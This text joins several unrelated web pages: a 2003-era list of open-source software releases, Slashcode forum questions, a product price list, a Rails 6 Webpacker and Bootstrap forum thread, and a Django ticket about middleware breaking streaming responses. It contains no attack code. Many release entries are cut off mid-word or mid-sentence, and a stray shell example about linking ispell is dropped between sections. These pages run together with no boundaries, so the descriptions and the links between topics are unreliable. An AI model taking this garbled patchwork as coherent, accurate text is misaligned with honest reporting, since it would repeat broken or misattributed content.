Grammars are written in a natural style of EBNF and regular expressions and support both speculative and final actions. DB_DataContainer 0.12.0 DB_DataContainer is a PEAR-compliant database persistence layer and data encapsulation class. It encapsulates the behavior required to make objects persistent, including loading, saving, and deleting objects in a persistent store. It currently supports relational databases and uses PEAR DB for database abstraction. DSPAM 2.6.0.67. Ebotula 0.1.7 Ebotula is an IRC bot for administration tasks in one or more channels. It has four access levels. The top level is the bot master, which gives a user complete access to all functions. The next level is the channel owner, who is the administrator of one channel. The other two are friends and regular users. The bot is a multithreaded application and can execute several commands simultaneously. The data are stored in gdbm hash files. Echo Web Application Framework 1.0 Echo is a framework for developing object-oriented, event-driven Web applications in Java. Echo frees the developer from having to think in terms of "page-based" applications and enables him/her to develop applications using the conventional object-oriented and event-driven paradigm for user interface development. Knowledge of HTML, HTTP, and JavaScript is not required. Tutorials, white papers, and full API documentation are available. EJBSpaces Alpha 4 EJBSpaces is an implementation of Sun's JavaSpaces, which is accessed through a J2EE application server such as WebLogic, JBoss, or WebSphere. It provides a business-centric, enterprise-scale implementation of JavaSpaces, and flattens the learning curve for experienced application developers by using JNDI rather than Discovery. It also uses built-in features such as RMI and HTTP. Emilia Pinball Project 0.3.0 (Alpha) The Emilia Pinball Project is a pinball simulator for Linux and other Unix systems. There is only one level to play with, but it is very addictive.
EMS MySQL Utils 1.4.0.1 (Import). EMS PostgreSQL Utils 1.4.0.1 (Import). Epiphany-browser 0.7.0 Epiphany is a GNOME Web browser based on the Mozilla rendering engine. Its goals are simplicity, standards compliance, and integration with GNOME. Fast File Search 1.0.3 Fast File Search crawls FTP servers and SMB shares (Windows shares and UNIX systems running Samba) and stores the information about files to a database. A Web interface is then used for searching files. Firestorm NIDS 0.5.3 Firestorm is an extremely high performance network intrusion detection system (NIDS). At the moment, it is just a sensor, but there are plans to include real support for analysis, reporting, remote console, and on-the-fly sensor configuration. It is fully pluggable and hence extremely flexible. fnord httpd 1.8 fnord httpd is a small HTTP server (15k static binary). It is fast, and supports sendfile and connection keep-alive, virtual domains, content-ranges, and IPv6. It does transparent content negotiation for special cases (html - html.gz, or gif - png). FollowMeIP 1.3 FollowMeIP is a small client that allows you to retrieve the IP address of your machine over the Web. It works by periodically sending your IP address to the FollowMeIP server, from where you can retrieve it using a password. It is ideal for people who are running servers on dynamic IP connections, or who are away from home and want to access their machines via TCP/IP. Fung-Calc 1.3.0 (Stable) Fung-Calc is an advanced yet easy-to-use graphing calculator written using the Qt libraries. It supports various graphing modes in both 2D and 3D. It combines all the features of a full-blown mathematical analysis package with ease of use. Galeon 1.3.5 (Unstable) Galeon is a GNOME Web browser based on Gecko (the Mozilla rendering engine). It is fast, has a light interface, and is fully standards-compliant. Galeon 1.2.11 Galeon is a GNOME Web browser based on Gecko (the Mozilla rendering engine).
It is fast, has a light interface, and is fully standards-compliant. gameping 1.4 Gameping is a command-line utility used to monitor game servers. It returns the average player's ping and loss. These two pieces of information are useful for evaluating the quality of a server. Gammu 0.77 (Development) Gammu (formerly known as MyGnokii2) is a cellular manager for various mobile phones and modems. It currently supports Nokia 3210, 33xx, 3410, 35xx, 51xx, 5210, 5510, 61xx, 62xx, 63xx, 6510, 6610, 6800, 71xx, 7210, 82xx, 83xx, 8910, 9110, and 9210, and AT devices (such as Siemens, Alcatel, Falcom, WaveCom, IPAQ, and others). It has a command line version with many functions for ringtones, phonebook, SMS, logos, WAP, date/time, alarm, calls, etc. It can also make full backups and restore them. It works on various Unix systems (like Linux) and Win32. ggcov 0.1.4 Ggcov is a GTK+ GUI for exploring test coverage data produced by C programs compiled with gcc -fprofile-arcs -ftest-coverage. It's basically a GUI replacement for the gcov program that comes with gcc. GkrellMMS 2.1.11 GkrellMMS is a plugin for controlling XMMS from within GKrellM. GNU MIX Development Kit 1.0. GPSFET 1.0.0 GPSFET (GPS Firmware Editing Tools) facilitates editing of Magellan GPS firmware. It allows you to, for example, replace the English words in the firmware with words in another, unsupported language, or add your personal information to the startup screen of the device. Other tools under development will allow modification of the graphical display of GPS data and the ability to upload (or import from SDCARD) vector and pixel maps obtained from free sources. Handy 0.2.0 Handy is a small command-line tool to synchronize a Lotus Notes appointment scheduler with KDE Organizer and a SIEMENS S35/S45 cellphone. It is able to read the result of the export function of a Lotus Notes client version 5.x.
It converts such a file into a vCal 2.0 file for the Organizer and can send the appointments to a cellphone over the IR Port or the serial device. ifsplot 0.4 ifsplot is an IFS attractor (fractal) plotter. Given an IFS (a set of affine transformations), it generates the associated fractal. The libplot library is employed, so any libplot driver is supported (X, eps, png, fig, etc.). Inside Systems Mail 1.6 Inside Systems Mail is a Webmail system that is programmed in PHP, makes heavy use of JavaScript/DOM, and is designed to work with any IMAP server (including Microsoft Exchange). It aims to be quick and easy to use, with an interface that most users will find familiar and several options that help fine-tune the Webmail experience. Jabber-SQL 0.1 Jabber-SQL allows authorized agents to execute SQL queries from a Jabber client and display the response in one or more channels. It can also be run in agent mode, in which case in addition to receiving new queries, it will automatically poll preconfigured queries at specified intervals and display the responses in one or more channels. Jabberwocky 2.0.05 (Development) Jabberwocky is a Lisp IDE containing a Lisp-aware editor with syntax highlighting, parentheses matching, a source analyzer, indentation, a source level debugger, a project explorer, and an interaction buffer. It is the replacement for the Lisp Debug project. JXPM 1.0 JXPM is an XPM processing library for Personal Java. It is coded 100% in Java, and is capable of reading and writing XPM images that are compressed with LZ77 (gzip). It supports color XPMs, transparent pixels (the "none" color name), and color names (such as "SeaGreen" or "DarkRed"). It works with java.awt.Image, supporting both the IndexColorModel and the DirectColorModel. It also supports TrueColor XPMs, but the design of the XPM format (color indexing) causes writing to be performed faster than reading, especially for large numbers of colors (>256).
kaffe 1.1.0 (Development) Kaffe is a complete, PersonalJava. Knoppix 3.2-2003-06-06. kses 0.1.0 kses is an HTML filter written in PHP. It filters all HTML elements and attributes that are not allowed, no matter how strange or tricky the HTML code is. This is helpful to stop cross-site scripting security holes. libcff 0.1 libcff provides a kind of C++ continued fractions toolkit. It lets you easily create continued fractions and estimate truncation errors. It also offers reliable continued fraction evaluation and approximating functions using continued fractions. libowfat 0.15 libowfat aims to reimplement the API defined by Prof. Dan Bernstein as extracted in the libdjb project. However, the reimplementation is covered by the GNU General Public License. The API is also extended slightly. LibZT 1.0.1 LibZT is a collection of utility code for C application/server development. It contains a ubiquitous logging subsystem, configuration file parser, commandline option parser, and numerous handy tools that need to be written for just about any project (wrappers to malloc, etc). LostIRC 0.2.7 LostIRC is a simple, yet very useful IRC client. It has features such as tab-autocompletion, multiple server support, automatic joining of servers/channels, and DCC sending, which should cover the needs of most people. Another design goal is 100% keyboard controllability. LostIRC was written using the gtkmm GUI library. Magic Cube 4D 2.1 MagicCube4D is a fully functional four-dimensional version of the Rubik's Cube puzzle. mailutils 0.3.1 mailutils contains a series of useful mail clients, servers, and libraries. These are the primary mail utilities of the GNU system. Max_links 0.01 Max_links is a simple link directory for Web sites. It uses PHP, MySQL, and CSS. mcGallery 2.0 (Professional) mc. Meta-Aqua 1.1 Meta-Aqua is based on the Sawfish theme "Aquaified" by Justin Hahn, using the same artwork. 
MIB Smithy 2.1.3 MIB Smithy is an application for SNMP developers, MIB designers, and Internet-draft authors. It provides a GUI-based environment for designing, editing, and compiling MIB modules according to the SMIv1 and SMIv2 standards. It accelerates the development process by removing the syntax and formatting concerns of designing MIBs by hand. It includes a number of built-in basic SNMP management tools, XML support, and (with MIB Smithy Professional) support for custom compiler output formats. MLdonkey 2.5-3 (Stable) MLDonkey is a multi-network file-sharing client. It was the first open-source client to access eDonkey. It runs as a daemon that can be controlled through telnet (command-line), HTTP (Web pages), and many different GUIs. It is written in Objective-Caml. It can currently access eDonkey, Overnet, Fasttrack (KaZaA, Imesh), Gnutella, Gnutella2 (Shareaza), BitTorrent, and Soulseek. Support for other networks (Direct Connect, Open Napster) is only partial. MMS Diary 0.94). moodss 17.3 Mood. It can react to thresholds and record data history in any database for later analysis or for presentation using common software. MusicControl 0.1 MusicControl is designed to put you in control of the music that gets played from your computer. It supports MP3, Ogg, and various module formats. MyAdvogato 1.0.1 (Stable) MyAdvogato is a fully-customizable CGI that acts as a wrapper for Advogato. In each call it fetches pages from the original Web site, modifies them on the fly according to user preferences, and returns the result. mysqlISP 1.1 mysqlISP lets you manage ISP customers, resellers, and their resources, and allows you to centralize resource and product usage. It works alone or in conjunction with the mysqlRadius, mysqlApache, mysqlBind, and mysqlSendmail applications of the openISP suite.
A user-friendly, 100% template driven -skin- interface ism|4 is also available from a third party (mysqlIPM and mysqlRadacct are also supported.) nanoweb 2.2.0. NetDraw 2.0 NetDraw is a simple Network drawing application. You can connect to a remote host and start to draw, and the remote host sees your drawing in real-time and can print and save it. NetThello 1.2 NetThello is a simple but fully functional Othello game written entirely in Cocoa. It includes support for two players on a single computer, playing over the Internet, and against a computer player. Noble Ape Simulation 0.662 The Noble Ape Simulation creates a random island environment and simulates the ape inhabitants of the island's cognitive processes. It features the Ocelot landscape rendering engine. num-utils 0.3. nut 8.8 nut. ObjectScript 1.3 (Stable), etc. Since it can be interactively interpreted, ObjectScript can be used to debug or learn Java systems. And since it supports extending Java classes and interfaces, it can add sophisticated scripting to an existing Java application. OpenGUI 4.1.0. openMosix Cluster for Linux 2.4.20-3. PCX Portal 0.3 (UserProperties) The PCX Portal provides a desktop environment, company, user and app management, context sensitive help, and multi-lingual support. It is written in Perl, and designed to provide the foundation for Web-based applications that need all of the above. PCX Portal 0.0.09 (template app) The PCX Portal provides a desktop environment, company, user and app management, context sensitive help, and multi-lingual support. It is written in Perl, and designed to provide the foundation for Web-based applications that need all of the above. PCX Portal 0.2.01 (pcxportal) The PCX Portal provides a desktop environment, company, user and app management, context sensitive help, and multi-lingual support. It is written in Perl, and designed to provide the foundation for Web-based applications that need all of the above. photos 3.5b1 photos. 
Project Manager X 1.75 PMX is a simple project management tool for OS X. It allows you to track, group, and manage project items and resource allocation. It displays the project in a nice Gantt chart that can be printed. It requires Mac OS X 10.2.3 or greater. Quax 0.9-2 Qu. ratpoison 1.2.2 Ratpoison is a simple window manager with no large library dependencies, no fancy graphics, no window decorations, and no rodent dependence. It is largely modeled after GNU Screen, which has done wonders in the virtual terminal market. All interaction with the window manager is done through keystrokes. ratpoison has a prefix map to minimize the key clobbering that cripples EMACS and other quality pieces of software. All windows are maximized and kept maximized to avoid wasting precious screen space. Samba 3.0.0 beta1 (3.0.x). SDBA Revolution 1.86, and the ability to use multiple access lists. It makes writing IM apps very much like writing mod_perl or PHP pages. It currently supports AIM, MSN, ICQ, YIM, and Jabber. The homepage has full tutorials and documentation. SDLPong 0.2 SDLPong is a Pong clone that is intended to feel "authentic", while adding additional features to extend gameplay. Sophie 3.03 (V3) Soph. sql++ 0.09 sql++ is an easily configurable, feature-rich, portable command-line SQL tool. It can be used with many different databases and in place of other command-line tools such as MySQL's mysql-client and Oracle's sqlplus. It has features such as multiple connections, multi-database interfacing, subselects for all databases, regardless of whether the database has native subselects or not, and much more. swsusp 1.0 pre5 (2.4 Development). System Watcher 0.2 Watcher is a daemon that gathers some system information and stores it in a preconfigured file. The information stored by Watcher includes uptime, running processes, free disk blocks, used disk blocks, system users, etc. System-Down::Rescue 1.0.0pre4 System-Down::Rescue is a free downloadable live distribution.
It is designed to recover damaged filesystems, copying the data to other physical disks or across networks, or burning it to a CD-ROM using cdrecord. It features a working hardware detection system. TarProxy 0.29 TarProxy is a statistically driven, pluggable SMTP proxy that can be used to deny spammers access to your bandwidth. tasks 1.6 rc1 tasks is built on PHP and MySQL. It features a dynamic hierarchical view of your tasks, scheduling due dates and associating URLs with tasks, an iCalendar of your tasks (scheduled tasks can go into the calendar as events or a task list), and a mobile version for easy access with a PDA. The Fish 0.4.1 The. The Gallery 1.3.4-RC3 (1. The SlotSig library 0.2 The. TkPasMan 2.2a (Stable) TkPasMan is a simple program that lets you store usernames and passwords for access to forums, mailing lists, and other websites. It is inspired by gpasman, but has more `paste' possibilities. For example, you can just paste a username and then the password behind it. tower toppler 1.0.2 Tower Toppler (aka Nebulous) is a reimplementation of an old 'jump and run' game. In this game you have to climb to the top of a tower avoiding all kinds of creatures that want to push you down. tvrec tools 0.1 tvrec tools is a set of scripts for controlling an alternative capture-script to record TV with a Linux system. These shell scripts, together with some other standard Linux programs, allow you to trigger recording, view recording status, and delete the whole recording queue via email or SMS (short message service). Uml2Daml Converter 0.4 (Development) The Uml2Daml Converter is a GUI application for automated transformation of UML 1.4 class diagrams (in XMI 1.1) into DAML+OIL or RDFS (RDF Schema) ontologies. It is also possible to visualize the ontologies as directed graphs. Since transformations are based on the XMI 1.1 standard, DAML+OIL/RDFS ontologies can be modeled with any UML tool able to produce XMI 1.1/UML 1.4 (such as TogetherJ 6.0).
Velocity editor plugin for Eclipse 1.0.2 Velocity editor plugin for Eclipse provides an editor for the scripting language of Jakarta's template engine Velocity. The editor is implemented as a plugin for the Eclipse platform. Vex 0.4.1 Vex is a visual editor for XML. It features a word processor-like interface. Video Disk Recorder 1.2.1 Video Disk Recorder (VDR) is a digital sat-receiver program using Linux and DVB technologies. It can record MPEG2 streams, as well as output the stream to TV. It also supports plugins for DVD, DivX, or MP3 playback and more. Vipul's Razor 2.34. VLevel 0.4 VLevel is a dynamic compressor that amplifies the quiet parts of music. It uses a look-ahead buffer to provide gradual changes, and never causes clipping. A command line filter and a LADSPA plugin are provided, and XMMS is supported. Worker 2.8.0. WowBB 1.3 WowBB is an innovative bulletin board with features including an auto install/upgrade, a WYSIWYG editor with integrated spell-checker, automatic time zone detection, topic-level new post tracking, smart caching, a visual style editor with real-time preview, and native file format support for major bulletin boards. XChat-Ruby 1.0. Xdebug 1.2.0 The Xdebug PHP extension aids script debugging by providing a lot of valuable information, including stack and function traces in error messages, memory allocation traces, and protection from infinite recursions. Xdebug also has a built-in debugging server which you can access with a debug client to debug your scripts remotely. Stepping, accessing data, and examining stacktraces are a few of the remote capabilities. XIWA 1.4.1 (Beta) XIWA (XIWA Is Web Accounting) is a Web-based accounting package built with Perl and PostgreSQL. It supports Double Entry/Stocks and has a powerful, flexible reporting engine. xtermset 0.5.2 xtermset is a command line utility to change several characteristics of an xterm. These are things like title, foreground color, background color, geometry, and position.
Furthermore, the xterm can be iconified, restored to normal size, or refreshed. YaRET 2.0.11 Y). ZIPDrop 0.1 ZIPDrop is a small Droplet which is meant to create zip files using the OS X command line zip utility. You can drop a folder onto it and get a .zip file with the content of the folder. .zip files generated by ZIPDrop are compatible with Stuffit Expander and WinZip. Slashcode Handling logging issues I'm using cronolog for my apache logs, and I really, really like it. I'd like to be able to use it on the slash logs as well, which become large and cumbersome over time with many sites running on a server. How do you all handle your logs? What do you use for log rotation? How long do you keep logs? Is anyone using cronolog, or something like it, with slash? RSS to Story?? launch of slash site "stupidsecurity.com" Announcing the opening of StupidSecurity.com. The site is meant to be a chronicle of idiotic and deceptive "security" measures. From the "three questions" that the airlines finally stopped asking to the closing of Meigs Airport in Chicago supposedly for security reasons, we want YOUR gripes about security measures that are just plain dumb! I'd welcome submissions (the stupider the better!), comments, complaints, and praise! MySQL 4.1+ I want to start using MySQL 4.1 to take advantage of the new Spatial extensions in MySQL to further enhance my plugin. I saw the recent story referring to using MySQL 4, but no direct mention of experience with versions 4+. Any tips or recommendations? Should I make the upgrade only on my development box, or is using 4+ okay? Any experience with 4.1, which is alpha? Section-specific Quick Links I'm in the process of setting up an intranet Slash 2 site for a company. Need help building Slash templates I have comps for a site I want built in Slash. While I have worked with Movable Type, building Slash templates is a whole different beast. I need someone to help me convert my comps into a functioning Slash site.
If you have these skills, please drop me a line with your rates and scheduling availability. You can see what the site will look like here. --Markos Preventing duplicates from being posted I'm getting sick of seeing duplicate posts all the time on Slashdot. I have a feature-request/enhancement that I would like to request for slashcode. It would be nice if, before a moderator submits a story, it checked all of the URLs in that post and matched them against the previous weeks'/months' stories for the same URL. If there is a match, throw up a warning saying that this story is a possible duplicate. This will help the moderator out too, since they wouldn't have to read every story on slashdot in the past two weeks. What do you think? Is this doable? --Min Idzelis. Adding ispell after slash is installed Hi, I read the (archived) thread at: 724238&mode=thread and I have "Running Weblogs with Slash", so I know that "... Slash 2.2 has added an ispell compatibility mode. If the ispell program exists and points to an ispell binary, the Edit Story page will include a list of potentially misspelled words.)" (thanks blagger), but I don't know exactly what to add, and into what directory. I installed FreeBSD 5.0, then built and installed the slashcode port, and now I've installed ispell. I then tried adding symlinks to ispell into various directories, including /usr/local/slash/bin, and restarting my browser and the FreeBSD box. Nothing obvious changes. Can someone tell me exactly which file to put where to enable spell-checking? I'm running slash-2.2.6 on FreeBSD 5.0. Thanks... P.S. Sorry if I misspelled anything, but....
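On the ispell question above: Slash simply shells out to whatever `ispell` binary it can find, so the mechanics amount to a symlink on the slashd daemon's PATH plus a restart of slashd (restarting the browser has no effect). The Slash install paths in the comments below are assumptions for a typical FreeBSD port layout; the runnable part uses a throwaway directory and a stand-in binary just to show that the symlink behaves exactly like its target:

```shell
# Demonstrate the symlink mechanics with a stand-in binary in a temp dir
tmp=$(mktemp -d)
printf '#!/bin/sh\necho fake-ispell\n' > "$tmp/real-ispell"
chmod +x "$tmp/real-ispell"
ln -s "$tmp/real-ispell" "$tmp/ispell"   # same idea as linking into slash's bin dir
"$tmp/ispell"                            # invoking the link runs the target

# For the real setup (paths are assumptions -- adjust to your install):
#   ln -s "$(command -v ispell)" /usr/local/slash/bin/ispell
# then restart slashd (not the browser) so the Edit Story page picks it up.
```

If the misspelled-words list still does not appear, check which PATH the slashd process actually runs with, since that is where Slash looks for the binary.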
Price Compare
256MB Secure Digital Card (SanDisk) Lowest Price: $60.00
JumpDrive Trio USB (Lexar Media) Lowest Price: $13.99
128MB Magic Gate Memory Stick Duo (Sony) Lowest Price: $74.49
256MB Secure Digital (Lexar Media) Lowest Price: $69.99
256MB CompactFlash Type I (SanDisk) Lowest Price: $52.90
Power Mac G4 (Apple) Lowest Price: $895.00
iMac PowerPC G4 800MHz 256MB 60GB CDRW/DVD-R (Apple) Lowest Price: $1794.00
XTREME - EXPLORER X4000 PC Intel Pentium 4 Processor 1.60 GHz, 256MB DDR, 40GB (Xtreme) Lowest Price: $558.00
Dimension 8200 (P4 2.2 GHz, 256MB, 40GB, CDRW) (Dell) Lowest Price: $1298.00
X3000 (AMD Thunderbird 1.2GHz, 512MB, 20GB 52X CD-ROM) (Xtreme) Lowest Price: $445.00
South Beach Diet by Arthur S. Agatston (Trade Cloth) Lowest Price: $10.98
Harry Potter and the Order of the Phoenix by J. K. Rowling (Trade Cloth) Lowest Price: $16.19
Haley's Hints by Graham Haley (Trade Cloth) Lowest Price: $15.99
Living History by Hillary Rodham Clinton (Trade Cloth) Lowest Price: $16.47
South Beach Diet by Arthur S. Agatston (Trade Cloth) Lowest Price: $15.19
==================================================
Copyright (c) 2002 OSDN. All rights reserved. Reproduction in whole or in part in any form or medium without express written permission of OSDN is prohibited.
--------------------------------------------------
url - email - [EMAIL PROTECTED]
Thanks for posting this and the previous video on using tailwindcss. It's helpful to see the main themes reinforced in each of the videos. One thing that I'm struggling with is what seems like a violation of POLS and the Rails-way in general where we are now putting SCSS files inside a javascripts folder. I understand that webpacker can just figure this out for us, but if I'm debugging a styling issue in an app I'm unfamiliar with I'm not sure I'd start by looking in a javascripts folder. Is there not a way to keep the separation of concerns explicit and store the stylesheets outside of the javascripts folder? The recommended place for stylesheets in Rails 6 is still the asset pipeline. Tailwind is a CSS framework generated by JS so it needs to be more tied to things than Bootstrap. This is all just side effects of what's going on in modern frontend. Rails is just trying to make that easier; unfortunately it is pretty messy, I think, but it's also doing more complex things now. @Chris Bloom You can set up webpacker to look in app/assets too. I tend to keep using app/assets/javascripts and app/assets/stylesheets, but app/javascripts for vue/stimulus/… components. See for example: Hi Chris, Another concern is the location of custom JavaScript. I am new to Rails so please excuse my ignorance. In Rails 5 we would add custom JS to its own .coffee files. For a Blog model I would write custom JS in a blog.coffee file and so on. In Rails 6 all JavaScript gets added to a single file, i.e. application.js. How can I keep them segregated? I've created a demo app with Rails 6 + Webpacker + Bootstrap (with CoreUI), no Sprockets Hey Chris, I'm getting this error: Webpacker can't find application in /Users/robthomas/Dropbox/rails/sample/public/packs/manifest.json. Possible causes: webpack -w or the webpack-dev-server.
Extracted source (around line #10): <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> <%= stylesheet_pack_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> <%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %> The error is on the <%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %> You can run bin/webpack to run webpack and see what the compilation error was. I'm getting the error Command "webpack" not found. I did and I got this: yarn install v1.16.0 [1/4] 🔍 Resolving packages... success Already up-to-date. ✨ Done in 0.45s. Hi there, What is stylesheet_pack_tag really for in Rails 6? I mean, if you import your styles in packs/application.js as done in this episode, webpack doesn't generate any CSS file. Moreover, if you inspect your HTML there is no reference to a CSS file either. I have done the same in a sample app without including stylesheet_pack_tag, and the styles are applied to the view anyway. This is making me very confused. The stylesheet pack tag is used for serving stylesheets in production, or in development if you have it configured that way. @chris any comment on using stylesheet_pack_tag with Hot Module Reloading (hmr)? The README states: If you have hmr turned to true, then the stylesheet_pack_tag generates no output, as you will want to configure your styles to be inlined in your JavaScript for hot reloading. During production and testing, the stylesheet_pack_tag will create the appropriate HTML tags. From Sigfrid's comment above, I'm guessing we should avoid stylesheet_pack_tag and instead import the CSS in packs/application.js.
This article suggests a similar approach: In order to do so [use hmr], we need to activate it in webpacker.yml and not import the stylesheets via stylesheet_pack_tag, since they will be included from packs/application.js. However, it seems to me that the suggested solution still uses stylesheet_pack_tag:

    # packs/application.js
    import './stylesheets'

and

    # app/views/layouts/application.html.erb
    <%= stylesheet_pack_tag 'stylesheets', 'data-turbolinks-track': 'reload' unless Webpacker.dev_server.hot_module_replacing? %>

Hi there, thanks for all of the webpack/rails 6 tutorials. They've been really helpful in upgrading a very old rails app to the latest and greatest. I'm having one small error, however. I have a couple of Bootstrap modal dialogs that get populated via an AJAX request. These POST data to the server, which responds with a JS file containing $('#myModal').modal('hide'); With the old asset pipeline method this worked, but I'm now getting this error: Uncaught TypeError: $(...).modal is not a function. If I include a jQuery command in the file it's available, but any Bootstrap function isn't. Any idea on how to expose all of the Bootstrap functions to the entire application?

The $(…).modal is not a function..

Thanks for the reply @leneborma. I should have been a little clearer in my explanation. The modal dialog, and all other Bootstrap JS (e.g. tooltips, popovers, etc.), works well when browsing around the site normally; it's just when I return Javascript from the server after processing the form that appeared in the modal dialog that I get that error. Step by step: 1) Browse to "New Order Page". 2) Fill in the form. 3) Click on the "Add New Item" button, which opens a modal dialog (via data-behaviour tags) that retrieves a form from the server. 4) Submit the "Add New Item" form. This returns some javascript from the server (via AJAX) which puts a new row on the bottom of the order, and attempts to close the modal dialog.
It's at this point that the $('#myModal').modal('hide'); causes an error. So, I'm not sure why it works at the start, and then stops working when processing the Javascript from the server. The jQuery that adds the new row works, but the modal command fails. There's nothing in the Javascript from the server that reloads jQuery, so I'm not sure if it's Turbolinks being weird, or if it's something else altogether. Thanks.

Find the solution in the @Jun Jiang repo cybros_core. We need to expose jQuery to the window object:

    # packs/application.js
    import JQuery from 'jquery';
    window.$ = window.JQuery = JQuery;

Why does HTML render faster than CSS/JS in this tutorial? Can someone explain that to me? Thank you.

Chris, thanks for the tutorial. I've noticed, though, that in a comment you mentioned it's still best to use CSS inside assets/stylesheets. However, with this in place you can't use mixins. If my stylesheet is in javascript/stylesheets, the mixins have no problems. When I add @import "../node_modules/bootstrap/scss/bootstrap"; to my stylesheet inside assets/stylesheets, the mixins work, but that's making webpack redundant, so I'm at a loss. Doesn't this make the asset pipeline completely redundant, or am I missing something?

You should be able to use mixins in the asset pipeline, as long as your filename ends in .scss so it gets processed with scss. It won't hurt to use Webpacker for everything. In fact, you need to in some cases, like when you're using TailwindCSS. Images don't really need to go through it since they don't need to be preprocessed, and if you have simpler CSS, then the asset pipeline is still around for that.

Thanks for the reply. I can use mixins if I import bootstrap into a .scss stylesheet inside of assets/stylesheets. If I use the setup in the video, then I can use the bootstrap javascript but mixins are not available inside .scss assets/stylesheets. They are only available in javascript/stylesheets.
I thought it may be some error on my side, but after trying three different fresh rails projects all had the same outcome.

    h1 { color: white; }
    @include media-breakpoint-only(xs) { h1 { margin-top: 500px; } }

That's the simple SCSS I'm using. I'll stick to using webpack for stylesheets then. If it's all loaded using yarn, it doesn't make sense to add it another way just for styling. Adding the below into an asset pipeline stylesheet fixes the mixin problem, though:

    @import "../node_modules/bootstrap/scss/bootstrap";

I might just remove the asset pipeline altogether, seeing as I'm not going to use it at all and webpack can handle images too.

Chris, I followed your instructions, and everything works well except when a view is rendered from an action of a controller that does not inherit from ApplicationController. If the controller inherits directly from ActionController::Base, the view is not styled by bootstrap. What's the deal with that? Any insight you can offer would be greatly appreciated!

Does it render a different layout? And if so, have you included the stylesheet tag in that layout?

Chris, thanks for the quick reply! Your comment about "layout" inspired me to read the docs, and now I understand how controllers decide what layout to use. Inserting layout "application" in the controller inheriting from ActionController::Base fixed the issue. I now understand too that I could have made a separate layout with the same name as the controller, or its parent, and put the stylesheet tag in it, and all would work as expected. Appreciate your help! Keep up the great work!
https://gorails.com/forum/how-to-use-bootstrap-with-webpack-rails-discussion
Opened 10 years ago
Closed 5 years ago
Last modified 5 years ago

#7581 closed New feature (fixed)

Middleware accessing HttpResponse.content breaks streaming HttpResponse objects.

Description

ConditionalGetMiddleware, GZipMiddleware, CommonMiddleware, and CsrfMiddleware all access response.content directly or indirectly. This prevents a streaming response from being initiated until any generator passed to the HttpResponse as content is consumed, which can cause a timeout when trying to stream large dynamically generated content. I've already put together a patch based on the assumption that HttpResponse._is_string being False indicates content has been passed in as a dynamic generator, and thus we shouldn't delay streaming a response to the browser while consuming the entire generator. The patch implements the following:

- Allow middleware to assign a new generator to HttpResponse.content without consuming it (e.g. GZipMiddleware)
- Compress chunks of content yielded by HttpResponse._container progressively in GZipMiddleware to allow streaming GZipped content
- Only generate an ETag in CommonMiddleware from HttpResponse.content if HttpResponse._is_string is True
- Only check that the length of HttpResponse.content is less than 200 in GZipMiddleware if HttpResponse._is_string is True
- Only set the Content-Length header in GZipMiddleware and ConditionalGetMiddleware if HttpResponse._is_string is True

With CommonMiddleware enabled by default and breaking the streaming response functionality if ETags are enabled in settings.py, I'd consider this a bug. It can be worked around by manually specifying a bogus ETag before returning the response, which doesn't seem ideal. With this patch, users still have the option of consuming a generator before passing it to the HttpResponse in order to enable ETag and Content-Length headers, and conditional GZipping when the content length is less than 200.
With CsrfMiddleware, the generator is only consumed when the Content-Type header is text/html or application/xhtml+xml, which may be an acceptable compromise - no streaming response for HTML content if you choose to use django.contrib.csrf. This patch accesses HttpResponse._is_string and HttpResponse._container from external middleware classes. Perhaps these properties could be made public and/or renamed to be more logical in this context?

Attachments (8)

Change History (57)

comment:1 Changed 10 years ago by

Changed 10 years ago by

add HttpResponse.content_generator, consume generators only once, set Content-Length in WSGIHandler.

comment:2 Changed 10 years ago by

From reading the patch I'm not sure why _get_content_generator is needed. You can always iterate over HttpResponse by calling iter() on it. What am I missing?

comment:3 follow-up: 4 Changed 10 years ago by

content_generator (and thus _get_content_generator) is needed so middleware have a public attribute to check for the existence of, and to return the actual content generator that was passed to HttpResponse. We could change _get_content_generator to return iter(self) instead, but we'd still need _get_content_generator to return a generator only when one was passed to HttpResponse. I think there might also be a problem if we return iter(self) to middleware. Because HttpResponse.next encodes each chunk as a bytestring, this could potentially encode each chunk multiple times if middleware sets a new content generator which yields unicode (or other) data, e.g. response.content = (something(e) for e in iter(response)) if something returned unicode. We'd also be passing a bytestring to something instead of the original content chunk. Even if something did not return unicode, it would at least call str on each chunk multiple times.
Isn't it better to pass the original content generator to middleware, and only call HttpResponse.next on each chunk once, when HttpResponse.content is finally accessed, which can only happen once because the generator is replaced with string content when that happens?

Changed 10 years ago by

fix django.contrib.csrf to work with content generators.

comment:4 follow-up: 5 Changed 10 years ago by

Replying to Tai Lee <real.human@mrmachine.net>:

    content_generator (and thus _get_content_generator) are needed so middleware have a public attribute to check for the existence of and return the actual content generator that was passed to HttpResponse. We could change _get_content_generator to return iter(self) instead, but we'd still need _get_content_generator to return a generator only when one was passed to HttpResponse.

or as a stream with iter(response). After discussion on the list I agree with Malcolm that middleware already knows if it wants the whole content or can stream it.

    I think there might also be a problem if we return iter(self) to middleware. Because HttpResponse.next encodes each chunk as a bytestring, this could potentially encode each chunk multiple times if middleware sets a new content generator which yields unicode

I have as many as 3 points to say about it, please don't fall asleep! :-)

-.

- When HttpResponse iterates over itself the first time it should just save the already encoded stream to avoid encoding multiple times as well as iterating.
I mean instead of self._container = [''.join(self._container)] it should be like self._container = [''.join([s for s in self])]

-:

    class HttpResponseWrapper(object):
        def __init__(self, response, iterable):
            self.response, self.iterable = response, iterable
        def __iter__(self):
            return iter(self.iterable)
        def __getattr__(self, name):
            return getattr(self.response, name)

    response = HttpResponseWrapper(response, gzip_content_generator(response))

comment:5 Changed 10 years ago by

Replying to Ivan Sagalaev <Maniac@SoftwareManiacs.Org>:

    or as a stream with iter(response). After discussion on the list I agree with Malcolm that middleware already knows if it wants the whole content or can stream it.

I think that middleware needs to be able to modify the response in different ways (or not at all) if the content is derived from a generator, so there needs to be a public attribute we can check to determine if the content is derived from a generator or not. An example is that CommonMiddleware should not generate an ETag, and ConditionalGetMiddleware should not set Content-Length, if content is derived from a generator. Another is that GZipMiddleware can compress the entire content in one operation if content is not derived from a generator, which may be more efficient or result in higher compression than compressing each chunk sequentially?

-.

By giving middleware access to the original content generator we can delay the conversion to byte string until HttpResponse.content is accessed, either by a middleware that requires the entire content or by WSGIHandler, and be sure that it occurs only once.

